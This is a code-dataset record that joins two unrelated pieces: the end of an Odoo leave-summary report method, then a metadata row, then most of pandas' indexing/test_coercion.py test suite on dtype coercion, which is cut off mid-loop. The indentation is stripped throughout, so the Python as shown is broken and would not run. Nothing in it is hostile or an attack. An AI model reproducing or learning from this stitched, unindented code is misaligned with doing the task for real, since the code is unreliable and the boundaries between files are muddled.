('employee_id', '=', empid), ('state', 'in', holiday_type),
('date_from', '<=', str(end_date)),
('date_to', '>=', str(start_date))
])
for holiday in holidays:
# Convert date to user timezone, otherwise the report will not be consistent with the
# value displayed in the interface.
date_from = fields.Datetime.from_string(holiday.date_from)
date_from = fields.Datetime.context_timestamp(holiday, date_from).date()
date_to = fields.Datetime.from_string(holiday.date_to)
date_to = fields.Datetime.context_timestamp(holiday, date_to).date()
for index in range(0, ((date_to - date_from).days + 1)):
if date_from >= start_date and date_from <= end_date:
res[(date_from-start_date).days]['color'] = holiday.holiday_status_id.color_name
date_from += timedelta(1)
count += holiday.number_of_days
self.sum = count
return res
def _get_data_from_report(self, data):
res = []
Employee = self.env['hr.employee']
if 'depts' in data:
for department in self.env['hr.department'].browse(data['depts']):
res.append({'dept' : department.name, 'data': [], 'color': self._get_day(data['date_from'])})
for emp in Employee.search([('department_id', '=', department.id)]):
res[len(res)-1]['data'].append({
'emp': emp.name,
'display': self._get_leaves_summary(data['date_from'], emp.id, data['holiday_type']),
'sum': self.sum
})
elif 'emp' in data:
res.append({'data':[]})
for emp in Employee.browse(data['emp']):
res[0]['data'].append({
'emp': emp.name,
'display': self._get_leaves_summary(data['date_from'], emp.id, data['holiday_type']),
'sum': self.sum
})
return res
def _get_holidays_status(self):
res = []
for holiday in self.env['hr.leave.type'].search([]):
res.append({'color': holiday.color_name, 'name': holiday.name})
return res
@api.model
def _get_report_values(self, docids, data=None):
if not data.get('form'):
raise UserError(_("Form content is missing, this report cannot be printed."))
holidays_report = self.env['ir.actions.report']._get_report_from_name('hr_holidays.report_holidayssummary')
holidays = self.env['hr.leave'].browse(self.ids)
return {
'doc_ids': self.ids,
'doc_model': holidays_report.model,
'docs': holidays,
'get_header_info': self._get_header_info(data['form']['date_from'], data['form']['holiday_type']),
'get_day': self._get_day(data['form']['date_from']),
'get_months': self._get_months(data['form']['date_from']),
'get_data_from_report': self._get_data_from_report(data['form']),
'get_holidays_status': self._get_holidays_status(),
}
| agpl-3.0 | 5,797,469,761,828,736,000 | 45.253968 | 137 | 0.566918 | false |
jreback/pandas | pandas/tests/indexing/test_coercion.py | 1 | 39801 | from datetime import timedelta
import itertools
from typing import Dict, List
import numpy as np
import pytest
from pandas.compat import IS64, is_platform_windows
import pandas as pd
import pandas._testing as tm
###############################################################
# Index / Series common tests which may trigger dtype coercions
###############################################################
@pytest.fixture(autouse=True, scope="class")
def check_comprehensiveness(request):
# Iterate over combination of dtype, method and klass
# and ensure that each are contained within a collected test
cls = request.cls
combos = itertools.product(cls.klasses, cls.dtypes, [cls.method])
def has_test(combo):
klass, dtype, method = combo
cls_funcs = request.node.session.items
return any(
klass in x.name and dtype in x.name and method in x.name for x in cls_funcs
)
opts = request.config.option
if opts.lf or opts.keyword:
# If we are running with "last-failed" or -k foo, we expect to only
# run a subset of tests.
yield
else:
for combo in combos:
if not has_test(combo):
raise AssertionError(
f"test method is not defined: {cls.__name__}, {combo}"
)
yield
class CoercionBase:
klasses = ["index", "series"]
dtypes = [
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64",
"datetime64tz",
"timedelta64",
"period",
]
@property
def method(self):
raise NotImplementedError(self)
def _assert(self, left, right, dtype):
# explicitly check dtype to avoid any unexpected result
if isinstance(left, pd.Series):
tm.assert_series_equal(left, right)
elif isinstance(left, pd.Index):
tm.assert_index_equal(left, right)
else:
raise NotImplementedError
assert left.dtype == dtype
assert right.dtype == dtype
class TestSetitemCoercion(CoercionBase):
method = "setitem"
def _assert_setitem_series_conversion(
self, original_series, loc_value, expected_series, expected_dtype
):
""" test series value's coercion triggered by assignment """
temp = original_series.copy()
temp[1] = loc_value
tm.assert_series_equal(temp, expected_series)
# check dtype explicitly for sure
assert temp.dtype == expected_dtype
# .loc works different rule, temporary disable
# temp = original_series.copy()
# temp.loc[1] = loc_value
# tm.assert_series_equal(temp, expected_series)
@pytest.mark.parametrize(
"val,exp_dtype", [(1, object), (1.1, object), (1 + 1j, object), (True, object)]
)
def test_setitem_series_object(self, val, exp_dtype):
obj = pd.Series(list("abcd"))
assert obj.dtype == object
exp = pd.Series(["a", val, "c", "d"])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(1, np.int64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_setitem_series_int64(self, val, exp_dtype, request):
obj = pd.Series([1, 2, 3, 4])
assert obj.dtype == np.int64
if exp_dtype is np.float64:
exp = pd.Series([1, 1, 3, 4])
self._assert_setitem_series_conversion(obj, 1.1, exp, np.int64)
mark = pytest.mark.xfail(reason="GH12747 The result must be float")
request.node.add_marker(mark)
exp = pd.Series([1, val, 3, 4])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(np.int32(1), np.int8), (np.int16(2 ** 9), np.int16)]
)
def test_setitem_series_int8(self, val, exp_dtype, request):
obj = pd.Series([1, 2, 3, 4], dtype=np.int8)
assert obj.dtype == np.int8
if exp_dtype is np.int16:
exp = pd.Series([1, 0, 3, 4], dtype=np.int8)
self._assert_setitem_series_conversion(obj, val, exp, np.int8)
mark = pytest.mark.xfail(
reason="BUG: it must be pd.Series([1, 1, 3, 4], dtype=np.int16"
)
request.node.add_marker(mark)
exp = pd.Series([1, val, 3, 4], dtype=np.int8)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(1, np.float64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_setitem_series_float64(self, val, exp_dtype):
obj = pd.Series([1.1, 2.2, 3.3, 4.4])
assert obj.dtype == np.float64
exp = pd.Series([1.1, val, 3.3, 4.4])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, object),
],
)
def test_setitem_series_complex128(self, val, exp_dtype):
obj = pd.Series([1 + 1j, 2 + 2j, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
exp = pd.Series([1 + 1j, val, 3 + 3j, 4 + 4j])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.int64),
(3, np.int64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.bool_),
],
)
def test_setitem_series_bool(self, val, exp_dtype, request):
obj = pd.Series([True, False, True, False])
assert obj.dtype == np.bool_
mark = None
if exp_dtype is np.int64:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool_)
mark = pytest.mark.xfail(reason="TODO_GH12747 The result must be int")
elif exp_dtype is np.float64:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool_)
mark = pytest.mark.xfail(reason="TODO_GH12747 The result must be float")
elif exp_dtype is np.complex128:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool_)
mark = pytest.mark.xfail(reason="TODO_GH12747 The result must be complex")
if mark is not None:
request.node.add_marker(mark)
exp = pd.Series([True, val, True, False])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(pd.Timestamp("2012-01-01"), "datetime64[ns]"), (1, object), ("x", object)],
)
def test_setitem_series_datetime64(self, val, exp_dtype):
obj = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
val,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
(pd.Timestamp("2012-01-01", tz="US/Pacific"), object),
(pd.Timestamp("2012-01-01"), object),
(1, object),
],
)
def test_setitem_series_datetime64tz(self, val, exp_dtype):
tz = "US/Eastern"
obj = pd.Series(
[
pd.Timestamp("2011-01-01", tz=tz),
pd.Timestamp("2011-01-02", tz=tz),
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
assert obj.dtype == "datetime64[ns, US/Eastern]"
exp = pd.Series(
[
pd.Timestamp("2011-01-01", tz=tz),
val,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(pd.Timedelta("12 day"), "timedelta64[ns]"), (1, object), ("x", object)],
)
def test_setitem_series_timedelta64(self, val, exp_dtype):
obj = pd.Series(
[
pd.Timedelta("1 day"),
pd.Timedelta("2 day"),
pd.Timedelta("3 day"),
pd.Timedelta("4 day"),
]
)
assert obj.dtype == "timedelta64[ns]"
exp = pd.Series(
[pd.Timedelta("1 day"), val, pd.Timedelta("3 day"), pd.Timedelta("4 day")]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
def _assert_setitem_index_conversion(
self, original_series, loc_key, expected_index, expected_dtype
):
""" test index's coercion triggered by assign key """
temp = original_series.copy()
temp[loc_key] = 5
exp = pd.Series([1, 2, 3, 4, 5], index=expected_index)
tm.assert_series_equal(temp, exp)
# check dtype explicitly for sure
assert temp.index.dtype == expected_dtype
temp = original_series.copy()
temp.loc[loc_key] = 5
exp = pd.Series([1, 2, 3, 4, 5], index=expected_index)
tm.assert_series_equal(temp, exp)
# check dtype explicitly for sure
assert temp.index.dtype == expected_dtype
@pytest.mark.parametrize(
"val,exp_dtype", [("x", object), (5, IndexError), (1.1, object)]
)
def test_setitem_index_object(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4], index=list("abcd"))
assert obj.index.dtype == object
if exp_dtype is IndexError:
temp = obj.copy()
msg = "index 5 is out of bounds for axis 0 with size 4"
with pytest.raises(exp_dtype, match=msg):
temp[5] = 5
else:
exp_index = pd.Index(list("abcd") + [val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(5, np.int64), (1.1, np.float64), ("x", object)]
)
def test_setitem_index_int64(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4])
assert obj.index.dtype == np.int64
exp_index = pd.Index([0, 1, 2, 3, val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(5, IndexError), (5.1, np.float64), ("x", object)]
)
def test_setitem_index_float64(self, val, exp_dtype, request):
obj = pd.Series([1, 2, 3, 4], index=[1.1, 2.1, 3.1, 4.1])
assert obj.index.dtype == np.float64
if exp_dtype is IndexError:
# float + int -> int
temp = obj.copy()
msg = "index 5 is out of bounds for axis 0 with size 4"
with pytest.raises(exp_dtype, match=msg):
temp[5] = 5
mark = pytest.mark.xfail(reason="TODO_GH12747 The result must be float")
request.node.add_marker(mark)
exp_index = pd.Index([1.1, 2.1, 3.1, 4.1, val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_series_period(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_complex128(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_bool(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_datetime64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_datetime64tz(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_timedelta64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_period(self):
raise NotImplementedError
class TestInsertIndexCoercion(CoercionBase):
klasses = ["index"]
method = "insert"
def _assert_insert_conversion(self, original, value, expected, expected_dtype):
""" test coercion triggered by insert """
target = original.copy()
res = target.insert(1, value)
tm.assert_index_equal(res, expected)
assert res.dtype == expected_dtype
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1, object),
(1.1, 1.1, object),
(False, False, object),
("x", "x", object),
],
)
def test_insert_index_object(self, insert, coerced_val, coerced_dtype):
obj = pd.Index(list("abcd"))
assert obj.dtype == object
exp = pd.Index(["a", coerced_val, "b", "c", "d"])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1, np.int64),
(1.1, 1.1, np.float64),
(False, False, object), # GH#36319
("x", "x", object),
],
)
def test_insert_index_int64(self, insert, coerced_val, coerced_dtype):
obj = pd.Int64Index([1, 2, 3, 4])
assert obj.dtype == np.int64
exp = pd.Index([1, coerced_val, 2, 3, 4])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1.0, np.float64),
(1.1, 1.1, np.float64),
(False, False, object), # GH#36319
("x", "x", object),
],
)
def test_insert_index_float64(self, insert, coerced_val, coerced_dtype):
obj = pd.Float64Index([1.0, 2.0, 3.0, 4.0])
assert obj.dtype == np.float64
exp = pd.Index([1.0, coerced_val, 2.0, 3.0, 4.0])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
],
ids=["datetime64", "datetime64tz"],
)
def test_insert_index_datetimes(self, fill_val, exp_dtype):
obj = pd.DatetimeIndex(
["2011-01-01", "2011-01-02", "2011-01-03", "2011-01-04"], tz=fill_val.tz
)
assert obj.dtype == exp_dtype
exp = pd.DatetimeIndex(
["2011-01-01", fill_val.date(), "2011-01-02", "2011-01-03", "2011-01-04"],
tz=fill_val.tz,
)
self._assert_insert_conversion(obj, fill_val, exp, exp_dtype)
if fill_val.tz:
msg = "Cannot compare tz-naive and tz-aware"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01"))
msg = "Timezones don't match"
with pytest.raises(ValueError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01", tz="Asia/Tokyo"))
else:
msg = "Cannot compare tz-naive and tz-aware"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01", tz="Asia/Tokyo"))
msg = "value should be a 'Timestamp' or 'NaT'. Got 'int' instead."
with pytest.raises(TypeError, match=msg):
obj.insert(1, 1)
pytest.xfail("ToDo: must coerce to object")
def test_insert_index_timedelta64(self):
obj = pd.TimedeltaIndex(["1 day", "2 day", "3 day", "4 day"])
assert obj.dtype == "timedelta64[ns]"
# timedelta64 + timedelta64 => timedelta64
exp = pd.TimedeltaIndex(["1 day", "10 day", "2 day", "3 day", "4 day"])
self._assert_insert_conversion(
obj, pd.Timedelta("10 day"), exp, "timedelta64[ns]"
)
# ToDo: must coerce to object
msg = "value should be a 'Timedelta' or 'NaT'. Got 'Timestamp' instead."
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01"))
# ToDo: must coerce to object
msg = "value should be a 'Timedelta' or 'NaT'. Got 'int' instead."
with pytest.raises(TypeError, match=msg):
obj.insert(1, 1)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(pd.Period("2012-01", freq="M"), "2012-01", "period[M]"),
(pd.Timestamp("2012-01-01"), pd.Timestamp("2012-01-01"), object),
(1, 1, object),
("x", "x", object),
],
)
def test_insert_index_period(self, insert, coerced_val, coerced_dtype):
obj = pd.PeriodIndex(["2011-01", "2011-02", "2011-03", "2011-04"], freq="M")
assert obj.dtype == "period[M]"
data = [
pd.Period("2011-01", freq="M"),
coerced_val,
pd.Period("2011-02", freq="M"),
pd.Period("2011-03", freq="M"),
pd.Period("2011-04", freq="M"),
]
if isinstance(insert, pd.Period):
exp = pd.PeriodIndex(data, freq="M")
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
else:
msg = r"Unexpected keyword arguments {'freq'}"
with pytest.raises(TypeError, match=msg):
with tm.assert_produces_warning(FutureWarning):
# passing keywords to pd.Index
pd.Index(data, freq="M")
@pytest.mark.xfail(reason="Test not implemented")
def test_insert_index_complex128(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_insert_index_bool(self):
raise NotImplementedError
class TestWhereCoercion(CoercionBase):
method = "where"
def _assert_where_conversion(
self, original, cond, values, expected, expected_dtype
):
""" test coercion triggered by where """
target = original.copy()
res = target.where(cond, values)
self._assert(res, expected, expected_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, object), (1.1, object), (1 + 1j, object), (True, object)],
)
def test_where_object(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
obj = klass(list("abcd"))
assert obj.dtype == object
cond = klass([True, False, True, False])
if fill_val is True and klass is pd.Series:
ret_val = 1
else:
ret_val = fill_val
exp = klass(["a", ret_val, "c", ret_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(fill_val * x for x in [5, 6, 7, 8])
exp = klass(["a", values[1], "c", values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, np.int64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_where_int64(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
if klass is pd.Index and exp_dtype is np.complex128:
pytest.skip("Complex Index not supported")
obj = klass([1, 2, 3, 4])
assert obj.dtype == np.int64
cond = klass([True, False, True, False])
exp = klass([1, fill_val, 3, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(x * fill_val for x in [5, 6, 7, 8])
exp = klass([1, values[1], 3, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val, exp_dtype",
[(1, np.float64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_where_float64(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
if klass is pd.Index and exp_dtype is np.complex128:
pytest.skip("Complex Index not supported")
obj = klass([1.1, 2.2, 3.3, 4.4])
assert obj.dtype == np.float64
cond = klass([True, False, True, False])
exp = klass([1.1, fill_val, 3.3, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(x * fill_val for x in [5, 6, 7, 8])
exp = klass([1.1, values[1], 3.3, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, object),
],
)
def test_where_series_complex128(self, fill_val, exp_dtype):
obj = pd.Series([1 + 1j, 2 + 2j, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
cond = pd.Series([True, False, True, False])
exp = pd.Series([1 + 1j, fill_val, 3 + 3j, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = pd.Series([True, False, True, True])
else:
values = pd.Series(x * fill_val for x in [5, 6, 7, 8])
exp = pd.Series([1 + 1j, values[1], 3 + 3j, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, object), (1.1, object), (1 + 1j, object), (True, np.bool_)],
)
def test_where_series_bool(self, fill_val, exp_dtype):
obj = pd.Series([True, False, True, False])
assert obj.dtype == np.bool_
cond = pd.Series([True, False, True, False])
exp = pd.Series([True, fill_val, True, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = pd.Series([True, False, True, True])
else:
values = pd.Series(x * fill_val for x in [5, 6, 7, 8])
exp = pd.Series([True, values[1], True, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), object),
],
ids=["datetime64", "datetime64tz"],
)
def test_where_series_datetime64(self, fill_val, exp_dtype):
obj = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Series([True, False, True, False])
exp = pd.Series(
[pd.Timestamp("2011-01-01"), fill_val, pd.Timestamp("2011-01-03"), fill_val]
)
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
values = pd.Series(pd.date_range(fill_val, periods=4))
if fill_val.tz:
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02 00:00", tz="US/Eastern"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04 00:00", tz="US/Eastern"),
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
values[1],
pd.Timestamp("2011-01-03"),
values[3],
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val",
[
pd.Timestamp("2012-01-01"),
pd.Timestamp("2012-01-01").to_datetime64(),
pd.Timestamp("2012-01-01").to_pydatetime(),
],
)
def test_where_index_datetime(self, fill_val):
exp_dtype = "datetime64[ns]"
obj = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Index([True, False, True, False])
result = obj.where(cond, fill_val)
expected = pd.DatetimeIndex([obj[0], fill_val, obj[2], fill_val])
tm.assert_index_equal(result, expected)
values = pd.Index(pd.date_range(fill_val, periods=4))
exp = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04"),
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.xfail(reason="GH 22839: do not ignore timezone, must be object")
def test_where_index_datetime64tz(self):
fill_val = pd.Timestamp("2012-01-01", tz="US/Eastern")
exp_dtype = object
obj = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Index([True, False, True, False])
msg = "Index\\(\\.\\.\\.\\) must be called with a collection of some kind"
with pytest.raises(TypeError, match=msg):
obj.where(cond, fill_val)
values = pd.Index(pd.date_range(fill_val, periods=4))
exp = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02", tz="US/Eastern"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04", tz="US/Eastern"),
],
dtype=exp_dtype,
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.xfail(reason="Test not implemented")
def test_where_index_complex128(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_where_index_bool(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_where_series_timedelta64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_where_series_period(self):
raise NotImplementedError
@pytest.mark.parametrize(
"value", [pd.Timedelta(days=9), timedelta(days=9), np.timedelta64(9, "D")]
)
def test_where_index_timedelta64(self, value):
tdi = pd.timedelta_range("1 Day", periods=4)
cond = np.array([True, False, False, True])
expected = pd.TimedeltaIndex(["1 Day", value, value, "4 Days"])
result = tdi.where(cond, value)
tm.assert_index_equal(result, expected)
msg = "value should be a 'Timedelta', 'NaT', or array of thos"
with pytest.raises(TypeError, match=msg):
# wrong-dtyped NaT
tdi.where(cond, np.datetime64("NaT", "ns"))
def test_where_index_period(self):
dti = pd.date_range("2016-01-01", periods=3, freq="QS")
pi = dti.to_period("Q")
cond = np.array([False, True, False])
# Passinga valid scalar
value = pi[-1] + pi.freq * 10
expected = pd.PeriodIndex([value, pi[1], value])
result = pi.where(cond, value)
tm.assert_index_equal(result, expected)
# Case passing ndarray[object] of Periods
other = np.asarray(pi + pi.freq * 10, dtype=object)
result = pi.where(cond, other)
expected = pd.PeriodIndex([other[0], pi[1], other[2]])
tm.assert_index_equal(result, expected)
# Passing a mismatched scalar
msg = "value should be a 'Period', 'NaT', or array of those"
with pytest.raises(TypeError, match=msg):
pi.where(cond, pd.Timedelta(days=4))
msg = r"Input has different freq=D from PeriodArray\(freq=Q-DEC\)"
with pytest.raises(ValueError, match=msg):
pi.where(cond, pd.Period("2020-04-21", "D"))
class TestFillnaSeriesCoercion(CoercionBase):
# not indexing, but place here for consistency
method = "fillna"
@pytest.mark.xfail(reason="Test not implemented")
def test_has_comprehensive_tests(self):
raise NotImplementedError
def _assert_fillna_conversion(self, original, value, expected, expected_dtype):
""" test coercion triggered by fillna """
target = original.copy()
res = target.fillna(value)
self._assert(res, expected, expected_dtype)
@pytest.mark.parametrize(
"fill_val, fill_dtype",
[(1, object), (1.1, object), (1 + 1j, object), (True, object)],
)
def test_fillna_object(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass(["a", np.nan, "c", "d"])
assert obj.dtype == object
exp = klass(["a", fill_val, "c", "d"])
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[(1, np.float64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_fillna_float64(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass([1.1, np.nan, 3.3, 4.4])
assert obj.dtype == np.float64
exp = klass([1.1, fill_val, 3.3, 4.4])
# float + complex -> we don't support a complex Index
# complex for Series,
# object for Index
if fill_dtype == np.complex128 and klass == pd.Index:
fill_dtype = object
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, object),
],
)
def test_fillna_series_complex128(self, fill_val, fill_dtype):
obj = pd.Series([1 + 1j, np.nan, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
exp = pd.Series([1 + 1j, fill_val, 3 + 3j, 4 + 4j])
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), object),
(1, object),
("x", object),
],
ids=["datetime64", "datetime64tz", "object", "object"],
)
def test_fillna_datetime(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
obj = klass(
[
pd.Timestamp("2011-01-01"),
pd.NaT,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
exp = klass(
[
pd.Timestamp("2011-01-01"),
fill_val,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.parametrize(
"fill_val,fill_dtype",
[
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
(pd.Timestamp("2012-01-01"), object),
(pd.Timestamp("2012-01-01", tz="Asia/Tokyo"), object),
(1, object),
("x", object),
],
)
def test_fillna_datetime64tz(self, index_or_series, fill_val, fill_dtype):
klass = index_or_series
tz = "US/Eastern"
obj = klass(
[
pd.Timestamp("2011-01-01", tz=tz),
pd.NaT,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
assert obj.dtype == "datetime64[ns, US/Eastern]"
exp = klass(
[
pd.Timestamp("2011-01-01", tz=tz),
fill_val,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
self._assert_fillna_conversion(obj, fill_val, exp, fill_dtype)
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_series_int64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_index_int64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_series_bool(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_index_bool(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_series_timedelta64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_series_period(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_index_timedelta64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_fillna_index_period(self):
raise NotImplementedError
class TestReplaceSeriesCoercion(CoercionBase):
klasses = ["series"]
method = "replace"
rep: Dict[str, List] = {}
rep["object"] = ["a", "b"]
rep["int64"] = [4, 5]
rep["float64"] = [1.1, 2.2]
rep["complex128"] = [1 + 1j, 2 + 2j]
rep["bool"] = [True, False]
rep["datetime64[ns]"] = [pd.Timestamp("2011-01-01"), pd.Timestamp("2011-01-03")]
for tz in ["UTC", "US/Eastern"]:
# to test tz => different tz replacement
